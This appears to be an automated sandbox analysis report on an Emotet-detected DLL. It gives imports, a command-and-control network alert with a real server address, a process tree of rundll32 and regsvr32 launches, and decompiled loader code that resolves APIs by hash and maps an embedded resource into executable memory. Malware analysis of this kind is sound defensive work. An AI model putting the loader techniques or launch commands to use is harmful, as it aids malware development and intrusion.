RT_GROUP_ICON | 0x74798 | 0x22 | data | |
None | 0x52708 | 0x1e | data | |
None | 0x521a0 | 0xa | data | Spanish | Mexico
DLL | Import
KERNEL32.dll | RtlUnwind, GetSystemTimeAsFileTime, GetCommandLineA, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, VirtualQuery, QueryPerformanceCounter, GetCurrentProcessId, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, SetStdHandle, SetEnvironmentVariableA, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapFree, HeapAlloc, GetTickCount, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, GetShortPathNameA, CreateFileA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetCurrentDirectoryA, GlobalFlags, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, CloseHandle, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, FreeLibrary, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, LoadLibraryA, FreeResource, SetLastError, GlobalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, lstrcpynA, LocalFree, ExitProcess, GetStringTypeExA, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, UnhandledExceptionFilter, InterlockedExchange
USER32.dll | KillTimer, WindowFromPoint, GetDCEx, LockWindowUpdate, RegisterClipboardFormatA, PostThreadMessageA, SetRect, CharNextA, DestroyIcon, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, LoadCursorA, GetSysColorBrush, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, IsZoomed, GetDC, ReleaseDC, LoadMenuA, DestroyMenu, UnpackDDElParam, ReuseDDElParam, ReleaseCapture, LoadAcceleratorsA, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, SetMenu, TranslateAcceleratorA, InvalidateRect, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, IsChild, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, TrackPopupMenu, SetForegroundWindow, SetTimer, GetClientRect, GetMenu, GetSysColor, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, UnregisterClassA, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, wsprintfA, GetWindowTextLengthA, GetWindowTextA, SetWindowPos, CharUpperA, UpdateWindow, EnableWindow, SendMessageA, GetClassInfoExA, GetSubMenu, GetMenuItemCount, InsertMenuA, GetMenuItemID, AppendMenuA, SetFocus, ShowWindow, MoveWindow, SetWindowLongA, GetDlgCtrlID, SetWindowTextA, IsDialogMessageA, SendDlgItemMessageA, GetMenuItemInfoA, InflateRect, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, MessageBeep, GetNextDlgGroupItem, SetCapture, InvalidateRgn, CopyAcceleratorTableA, GetMenuStringA, GetMenuState, EndDialog, GetNextDlgTabItem, GetParent, IsWindowEnabled, GetDlgItem, GetWindowLongA, IsWindow, DestroyWindow, CreateDialogIndirectParamA, GetSystemMetrics, SetActiveWindow, GetActiveWindow, GetDesktopWindow, PostQuitMessage, PostMessageA, SetCursor, ShowOwnedPopups, GetLastActivePopup, MessageBoxA, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, DispatchMessageA
GDI32.dll | CreateSolidBrush, CreateFontIndirectA, GetBkColor, GetTextColor, GetStockObject, GetRgnBox, PatBlt, SetRectRgn, CombineRgn, GetMapMode, CreatePatternBrush, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetPixel, BitBlt, GetWindowExtEx, CreateRectRgnIndirect, GetDeviceCaps, CreateRectRgn, SelectClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetBkMode, RestoreDC, SaveDC, GetTextExtentPoint32A, GetTextMetricsA, CreateFontA, GetCharWidthA, DeleteObject, SelectObject, StretchDIBits, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetViewportExtEx
comdlg32.dll | GetSaveFileNameA, GetFileTitleA, GetOpenFileNameA
WINSPOOL.DRV | OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll | GetFileSecurityA, RegSetValueA, RegOpenKeyA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegCreateKeyA, RegCloseKey, SetFileSecurityA
SHELL32.dll | DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragFinish
                                                                                                          COMCTL32.dllImageList_Draw, ImageList_GetImageInfo, ImageList_Destroy
                                                                                                          SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                                                          oledlg.dll
                                                                                                          ole32.dllCreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemFree, OleUninitialize, CoFreeUnusedLibraries, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard, CoRevokeClassObject, CoTaskMemAlloc, OleInitialize
                                                                                                          OLEAUT32.dllSysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysFreeString
Name | Ordinal | Address
DllRegisterServer | 1 | 0x10005090
DllUnregisterServerr | 2 | 0x100050c0
Language of compilation system | Country where language is spoken
Spanish | Mexico
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/24/22-00:16:29.728687 | TCP | 2404336 | ET CNC Feodo Tracker Reported CnC Server TCP group 19 | 49785 | 8080 | 192.168.2.6 | 51.91.76.89
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 24, 2022 00:16:35.147722960 CEST | 8.8.8.8 | 192.168.2.6 | 0xbc56 | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.236.128 | A (IP address) | IN (0x0001)
May 24, 2022 00:16:35.147722960 CEST | 8.8.8.8 | 192.168.2.6 | 0xbc56 | No error (0) | windowsupdatebg.s.llnwi.net | | 178.79.242.0 | A (IP address) | IN (0x0001)


                                                                                                          Target ID:0
                                                                                                          Start time:00:15:35
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:loaddll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll"
                                                                                                          Imagebase:0x1280000
                                                                                                          File size:116736 bytes
                                                                                                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:1
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                                                                                                          Imagebase:0xed0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:2
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\l2sFDHB0lp.dll
                                                                                                          Imagebase:0x9b0000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Target ID:3
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\l2sFDHB0lp.dll",#1
                                                                                                          Imagebase:0xee0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Target ID:4
                                                                                                          Start time:00:15:36
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllRegisterServer
                                                                                                          Imagebase:0xee0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Target ID:5
                                                                                                          Start time:00:15:40
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\l2sFDHB0lp.dll,DllUnregisterServerr
                                                                                                          Imagebase:0xee0000
                                                                                                          File size:61952 bytes
                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Target ID:6
                                                                                                          Start time:00:15:42
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz"
                                                                                                          Imagebase:0x9b0000
                                                                                                          File size:20992 bytes
                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high

                                                                                                          Target ID:12
                                                                                                          Start time:00:16:14
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Target ID:13
                                                                                                          Start time:00:16:20
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Target ID:17
                                                                                                          Start time:00:16:56
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Target ID:20
                                                                                                          Start time:00:17:18
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language

                                                                                                          Target ID:22
                                                                                                          Start time:00:17:33
                                                                                                          Start date:24/05/2022
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                          Imagebase:0x7ff726010000
                                                                                                          File size:51288 bytes
                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:7.7%
                                                                                                            Total number of Nodes:418
                                                                                                            Total number of Limit Nodes:16

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
                                                                                                            				void* _v4;
                                                                                                            				void* _t36;
                                                                                                            				void* _t39;
                                                                                                            				void* _t40;
                                                                                                            				intOrPtr _t42;
                                                                                                            				intOrPtr _t43;
                                                                                                            				intOrPtr _t44;
                                                                                                            				intOrPtr _t45;
                                                                                                            				intOrPtr _t46;
                                                                                                            				intOrPtr _t47;
                                                                                                            				intOrPtr _t48;
                                                                                                            				intOrPtr _t49;
                                                                                                            				intOrPtr _t50;
                                                                                                            				intOrPtr _t51;
                                                                                                            				intOrPtr _t52;
                                                                                                            				intOrPtr _t53;
                                                                                                            				intOrPtr _t54;
                                                                                                            				intOrPtr _t55;
                                                                                                            				intOrPtr _t56;
                                                                                                            				intOrPtr _t57;
                                                                                                            				intOrPtr _t58;
                                                                                                            				intOrPtr _t59;
                                                                                                            				intOrPtr _t60;
                                                                                                            				intOrPtr _t61;
                                                                                                            				intOrPtr _t62;
                                                                                                            				intOrPtr _t63;
                                                                                                            				intOrPtr _t64;
                                                                                                            				struct HRSRC__* _t65;
                                                                                                            				signed int _t68;
                                                                                                            				signed int _t69;
                                                                                                            				void* _t77;
                                                                                                            				void* _t79;
                                                                                                            				intOrPtr _t83;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t96;
                                                                                                            				void* _t97;
                                                                                                            				signed int _t99;
                                                                                                            				signed int _t100;
                                                                                                            				signed int _t110;
                                                                                                            				signed int _t112;
                                                                                                            				signed int _t113;
                                                                                                            				long _t117;
                                                                                                            				signed int _t119;
                                                                                                            				void* _t121;
                                                                                                            				struct HRSRC__* _t123;
                                                                                                            				int _t124;
                                                                                                            				void* _t127;
                                                                                                            				struct HINSTANCE__* _t128;
                                                                                                            				signed int _t129;
                                                                                                            				void* _t133;
                                                                                                            				signed int _t138;
                                                                                                            				signed int _t149;
                                                                                                            				signed int _t152;
                                                                                                            				signed int _t157;
                                                                                                            				intOrPtr _t182;
                                                                                                            
                                                                                                            				if(_a8 != 1) {
                                                                                                            					L6:
                                                                                                            					return 1;
                                                                                                            				} else {
                                                                                                            					_t36 = E10005040(__edi);
                                                                                                            					_t181 = _t36;
                                                                                                            					if(_t36 != 0) {
                                                                                                            						_push(0x1003ce28);
                                                                                                            						E10011135(__ebx, __edi, __esi, __eflags);
                                                                                                            						__eflags = 0;
                                                                                                            						return 0;
                                                                                                            					} else {
                                                                                                            						_push(__ebx);
                                                                                                            						_push(__ebp);
                                                                                                            						_push(__esi);
                                                                                                            						_push(__edi);
                                                                                                            						_push(L"kernel32.dll");
                                                                                                            						_push(0x3801a8f2);
                                                                                                            						_push(0x1a322e2e);
                                                                                                            						_push(0x628ad09);
                                                                                                            						_push(0x31c6c0a1);
                                                                                                            						_push(0x28b4cee6);
                                                                                                            						 *0x1004b0d8 = 0;
                                                                                                            						 *0x1004b0dc = 0;
                                                                                                            						 *0x1004b0e0 = 0;
                                                                                                            						 *0x1004b0e8 = 0;
                                                                                                            						 *0x1004b0e4 = 0;
                                                                                                            						 *0x1004b0ec = 0;
                                                                                                            						 *0x1004b0f0 = 0;
                                                                                                            						_t39 = E10001E60(_t181);
                                                                                                            						_push(L"ntdll.dll");
                                                                                                            						_push(0x1c9cdc39);
                                                                                                            						_push(0x2d34cc91);
                                                                                                            						_push(0x118db97f);
                                                                                                            						_push(0x348b2998);
                                                                                                            						_push(0x3446e98c);
                                                                                                            						_t127 = _t39;
                                                                                                            						_t40 = E10001E60(_t181);
                                                                                                            						_push(L"msvcrt.dll");
                                                                                                            						_push(0xe094f82);
                                                                                                            						_push(0x20e23fe3);
                                                                                                            						_push(0x156af904);
                                                                                                            						_push(0x108d4cdc);
                                                                                                            						_push(0x106d66fc);
                                                                                                            						_t121 = E10001E60(_t181);
                                                                                                            						_push(0x3ee42795);
                                                                                                            						_push(_t121);
                                                                                                            						_t42 = E10001FF0();
                                                                                                            						_push(0x402c2791);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3f0 = _t42;
                                                                                                            						_t43 = E10001FF0();
                                                                                                            						_push(0xb29018f0);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3ec = _t43;
                                                                                                            						_t44 = E10001FF0();
                                                                                                            						_push(0xccfd283f);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3e0 = _t44;
                                                                                                            						_t45 = E10001FF0();
                                                                                                            						_push(0x298c691d);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3d0 = _t45;
                                                                                                            						_t46 = E10001FF0();
                                                                                                            						_push(0x40ec656b);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3e4 = _t46;
                                                                                                            						_t47 = E10001FF0();
                                                                                                            						_push(0x40946966);
                                                                                                            						_push(_t121);
                                                                                                            						 *0x1004d3fc = _t47;
                                                                                                            						_t48 = E10001FF0();
                                                                                                            						_push(0x5496c247);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3a8 = _t48;
                                                                                                            						_t49 = E10001FF0();
                                                                                                            						_push(0x3b465a8a);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3ac = _t49;
                                                                                                            						_t50 = E10001FF0();
                                                                                                            						_push(0x66afc09d);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3b8 = _t50;
                                                                                                            						_t51 = E10001FF0();
                                                                                                            						_push(0x5eb2ba6);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3d4 = _t51;
                                                                                                            						_t52 = E10001FF0();
                                                                                                            						_push(0x3c6bbc0e);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3cc = _t52;
                                                                                                            						_t53 = E10001FF0();
                                                                                                            						_push(0x3f32f2a5);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3c8 = _t53;
                                                                                                            						_t54 = E10001FF0();
                                                                                                            						_push(0x112ecd9a);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3d8 = _t54;
                                                                                                            						_t55 = E10001FF0();
                                                                                                            						_push(0xcfb09550);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d400 = _t55;
                                                                                                            						_t56 = E10001FF0();
                                                                                                            						_push(0x30fe1b19);
                                                                                                            						_push(_t40);
                                                                                                            						 *0x1004d3bc = _t56;
                                                                                                            						_t57 = E10001FF0();
                                                                                                            						_push(0x33a92211);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3b4 = _t57;
                                                                                                            						_t58 = E10001FF0();
                                                                                                            						_push(0xaab3e2a9);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3f8 = _t58;
                                                                                                            						_t59 = E10001FF0();
                                                                                                            						_push(0x31e84135);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3f4 = _t59;
                                                                                                            						_t60 = E10001FF0();
                                                                                                            						_push(0xaef34aa1);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3dc = _t60;
                                                                                                            						_t61 = E10001FF0();
                                                                                                            						_push(0x1e75927d);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3b0 = _t61;
                                                                                                            						_t62 = E10001FF0();
                                                                                                            						_push(0x56331b6e);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3e8 = _t62;
                                                                                                            						_t63 = E10001FF0();
                                                                                                            						_push(0x1cf8ffb);
                                                                                                            						_push(_t127);
                                                                                                            						 *0x1004d3c4 = _t63;
                                                                                                            						_t64 = E10001FF0();
                                                                                                            						_t128 = _a4;
                                                                                                            						 *0x1004d3c0 = _t64; // executed
                                                                                                            						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
                                                                                                            						_t123 = _t65;
                                                                                                            						_v4 = LoadResource(_t128, _t123);
                                                                                                            						_t124 = SizeofResource(_t128, _t123);
                                                                                                            						_t182 =  *0x1004d3b8; // 0x76ec66e0
                                                                                                            						if(_t182 == 0) {
                                                                                                            							_t96 =  *0x1004b0e8; // 0x0
                                                                                                            							_t113 =  *0x1004b0e0; // 0x0
                                                                                                            							_t68 =  *0x1004b0d8; // 0x0
                                                                                                            							_t129 =  *0x1004b0dc; // 0x0
                                                                                                            							_t149 =  *0x1004b0ec; // 0x0
                                                                                                            							_t69 =  *0x1004b0e4; // 0x0
                                                                                                            							_t15 = _t113 * 2; // 0x3
                                                                                                            							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
                                                                                                            							_a8 = _t152;
                                                                                                            							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
                                                                                                            							_t20 = _t96 + 2; // 0x2
                                                                                                            							_t157 =  *0x1004b0d8; // 0x0
                                                                                                            							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
                                                                                                            							__eflags = _t117;
                                                                                                            							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
                                                                                                            						} else {
                                                                                                            							_t112 =  *0x1004b0e8; // 0x0
                                                                                                            							_t119 =  *0x1004b0dc; // 0x0
                                                                                                            							_t85 =  *0x1004b0ec; // 0x0
                                                                                                            							_t99 =  *0x1004b0d8; // 0x0
                                                                                                            							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
                                                                                                            							_t138 =  *0x1004b0e0; // 0x0
                                                                                                            							_t8 = _t138 * 2; // 0x3
                                                                                                            							_t100 =  *0x1004b0e0; // 0x0
                                                                                                            							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
                                                                                                            						}
